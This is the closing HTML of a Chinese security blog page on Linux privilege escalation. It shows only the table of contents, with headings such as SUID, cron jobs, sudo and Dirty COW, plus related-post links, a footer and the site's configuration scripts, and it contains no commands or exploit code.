class="toc-number">1.5.</span> <span class="toc-text"> 反弹 shell</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#%E4%B8%BB%E6%9C%BA%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="toc-number">1.6.</span> <span class="toc-text"> 主机信息收集</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#suid%E6%8F%90%E6%9D%83"><span class="toc-number">1.7.</span> <span class="toc-text"> SUID 提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E8%AF%BBshadow%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8"><span class="toc-number">2.</span> <span class="toc-text"> 可读 shadow 文件利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E5%86%99shadow%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8"><span class="toc-number">3.</span> <span class="toc-text"> 可写 shadow 文件利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8F%AF%E5%86%99passwd%E6%96%87%E4%BB%B6%E5%88%A9%E7%94%A8"><span class="toc-number">4.</span> <span class="toc-text"> 可写 passwd 文件利用</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-number">5.</span> <span class="toc-text"> 计划任务提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E6%8F%90%E6%9D%83"><span class="toc-number">6.</span> <span class="toc-text"> 计划任务环境变量提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E9%80%9A%E9%85%8D%E7%AC%A6%E6%8F%90%E6%9D%83"><span class="toc-number">7.</span> <span class="toc-text"> 计划任务通配符提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#suid%E5%8E%9F%E7%90%86%E8%AF%A6%E8%A7%A3"><span class="toc-number">8.</span> <span class="toc-text"> SUID 原理详解</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#suid%E5%85%B1%E4%BA%AB%E5%BA%93%E6%8F%90%E6%9D%83"><span class="toc-number">8.1.</span> <span class="toc-text"> SUID 共享库提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#suid%E7%8E%AF%E5%A2%83%E5%8F%98%E9%87%8F%E5%8A%AB%E6%8C%81%E6%8F%90%E6%9D%83"><span class="toc-number">8.2.</span> <span class="toc-text"> SUID 环境变量劫持提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#suid-%E6%BB%A5%E7%94%A8shell%E5%8A%9F%E8%83%BD%E6%8F%90%E6%9D%83"><span class="toc-number">8.3.</span> <span class="toc-text"> SUID - 滥用 shell 功能提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#nsf%E6%8F%90%E6%9D%83"><span class="toc-number">9.</span> <span class="toc-text"> NSF 提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%86%85%E6%A0%B8%E6%8F%90%E6%9D%83"><span class="toc-number">10.</span> <span class="toc-text"> 内核提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%8F%E7%89%9B%E6%8F%90%E6%9D%83cve-2016-5195"><span class="toc-number">10.1.</span> <span class="toc-text"> 脏牛提权 (CVE-2016-5195)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#motd%E6%9C%BA%E5%88%B6%E6%8F%90%E6%9D%83"><span class="toc-number">11.</span> <span class="toc-text"> MOTD 机制提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#sudo%E6%8F%90%E6%9D%83"><span class="toc-number">12.</span> <span class="toc-text"> sudo 提权</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#sudofind-%E6%8F%90%E6%9D%83"><span class="toc-number">12.1.</span> <span class="toc-text"> sudofind 提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sudoapt%E6%8F%90%E6%9D%83"><span class="toc-number">12.2.</span> <span class="toc-text"> sudoapt 提权</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sudovim%E6%8F%90%E6%9D%83"><span class="toc-number">12.3.</span> <span class="toc-text"> sudovim 提权</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gtfobins"><span class="toc-number">13.</span> <span class="toc-text"> GTFOBins</span></a></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li ><a href="/2023/10/30/network-security/neiwang/%E5%9F%9F%E7%8E%AF%E5%A2%83/%E5%9F%9F%E7%8E%AF%E5%A2%83/" rel="bookmark" title="域环境">域环境</a></li><li ><a href="/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/" rel="bookmark" title="Windows提权">Windows提权</a></li><li  class="active"><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/" rel="bookmark" title="linux提权">linux提权</a></li><li ><a href="/2024/03/03/network-security/neiwang/%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="bookmark" title="内网信息收集">内网信息收集</a></li><li ><a href="/2024/03/05/network-security/neiwang/win%E5%8D%8F%E8%AE%AE/win%E5%8D%8F%E8%AE%AE/" rel="bookmark" title="win协议认证知识">win协议认证知识</a></li><li ><a href="/2024/03/07/network-security/neiwang/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/" rel="bookmark" title="Token窃取利用">Token窃取利用</a></li><li ><a href="/2024/03/08/network-security/neiwang/BloodHound%E5%B7%A5%E5%85%B7/BloodHound%E5%B7%A5%E5%85%B7/" rel="bookmark" title="BloodHound工具">BloodHound工具</a></li><li ><a href="/2024/03/09/network-security/neiwang/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/" rel="bookmark" title="域用户枚举密码喷洒">域用户枚举密码喷洒</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" itemprop="image" alt="云逸" data-src="/assets/avatar.jpg"/><p class="name" itemprop="name">云逸</p><div class="description" itemprop="description"></div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">28</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">13</span><span class="name">分类</span></a></div></nav><div class="social"><a href="https://gyzero1.github.io/" class="item github" rel="noopener" title="https:&#x2F;&#x2F;gyzero1.github.io&#x2F;" target="_blank"><i class="ic i-github"></i></a><a href="https://about.me/gyzero" class="item about" rel="noopener" title="https:&#x2F;&#x2F;about.me&#x2F;gyzero" target="_blank"><i class="ic i-address-card"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-user"></i>关于</a><ul class="submenu"><li class="item"><a href="/about/" rel="section"><i class="ic i-user"></i>关于本站</a></li><li class="item"><a href="/admiration/" rel="section"><i class="ic i-coffee"></i>赞赏博主</a></li></ul></li><li class="item dropdown"><a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a><ul class="submenu"><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li><li class="item"><a href="/categories" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li></ul></li><li class="item"><a href="/friends/" rel="section"><i class="ic i-heart"></i>友链</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2023/11/12/network-security/neiwang/%E7%BB%95%E9%98%B2%E7%81%AB%E5%A2%99/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2023/11/09/network-security/neiwang/Windows%E6%8F%90%E6%9D%83/Windows%E6%8F%90%E6%9D%83/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/%E6%BC%8F%E6%B4%9E%E9%9B%86/" title="分类于漏洞集">漏洞集</a></div><span><a href="/2023/11/02/%E6%BC%8F%E6%B4%9E%E9%9B%86/%E6%BC%8F%E6%B4%9E%E9%9B%86/">瑞友应用虚拟化系统rce</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/" title="分类于编程语言">编程语言</a><i class="ic i-angle-right"></i><a href="/categories/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/" title="分类于php基础">php基础</a></div><span><a href="/2023/12/12/%E7%BC%96%E7%A8%8B%E8%AF%AD%E8%A8%80/php%E5%9F%BA%E7%A1%80/PHP%E5%B8%B8%E9%87%8F/PHP%E5%B8%B8%E9%87%8F/">PHP常量</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/sql/" title="分类于sql注入">sql注入</a></div><span><a href="/2023/10/28/%E6%BC%8F%E6%B4%9E/sql%E6%B3%A8%E5%85%A5/">sql注入</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/09/network-security/neiwang/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/%E5%9F%9F%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E5%AF%86%E7%A0%81%E5%96%B7%E6%B4%92/">域用户枚举密码喷洒</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/07/network-security/neiwang/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/Token%E7%AA%83%E5%8F%96%E5%88%A9%E7%94%A8/">Token窃取利用</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2024/03/05/network-security/neiwang/win%E5%8D%8F%E8%AE%AE/win%E5%8D%8F%E8%AE%AE/">win协议认证知识</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a></div><span><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/xss%E6%BC%8F%E6%B4%9E/">xss漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/neiwang/" title="分类于内网安全">内网安全</a></div><span><a href="/2023/11/10/network-security/neiwang/linux%E6%8F%90%E6%9D%83/linux%E6%8F%90%E6%9D%83/">linux提权</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a></div><span><a href="/2023/11/01/%E6%BC%8F%E6%B4%9E/%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/">命令执行漏洞</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/network-security/" title="分类于网络安全">网络安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/" title="分类于web安全">web安全</a><i class="ic i-angle-right"></i><a href="/categories/network-security/web-security/Basic-vulnerabilities/" title="分类于基础漏洞">基础漏洞</a></div><span><a href="/2023/10/30/%E6%BC%8F%E6%B4%9E/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E/">文件包含漏洞</a></span></li></ul></div><div class="rpost pjax"><h2>最新评论</h2><ul class="leancloud-recent-comment" id="new-comment"></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2024</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">云逸 @ 云逸'bolg</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">193k 字</span><span class="post-meta-divider">|</span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">2:56</span></div><div class="powered-by">基于 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & Theme.<a href="https://github.com/theme-shoka-x/hexo-theme-shokaX/" rel="noopener" target="_blank">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
        path: `2023/11/10/network-security/neiwang/linux提权/linux提权/`,
        favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,
    chart: false,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    fancybox: true,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    },
    ignores: [
        (uri) => uri.includes('#'),
        (uri) => new RegExp(LOCAL.path + '$').test(uri),
            []
    ]
};
</script><script src="https://polyfill.io/v3/polyfill.min.js?features=default,fetch"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/pace/1.0.2/pace.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/algoliasearch/4.12.1/algoliasearch-lite.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/instantsearch.js/4.39.0/instantsearch.production.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/quicklink/2.2.0/quicklink.umd.min.js"></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/??jquery/3.5.1/jquery.min.js,fancybox/3.5.7/jquery.fancybox.min.js,justifiedGallery/3.8.1/js/jquery.justifiedGallery.min.js" async></script><script src="https://lf9-cdn-tos.bytecdntp.com/cdn/expire-6-M/KaTeX/0.15.2/contrib/copy-tex.min.js" async></script><script src="/js/app.js?v=0.3.6"></script></body></html>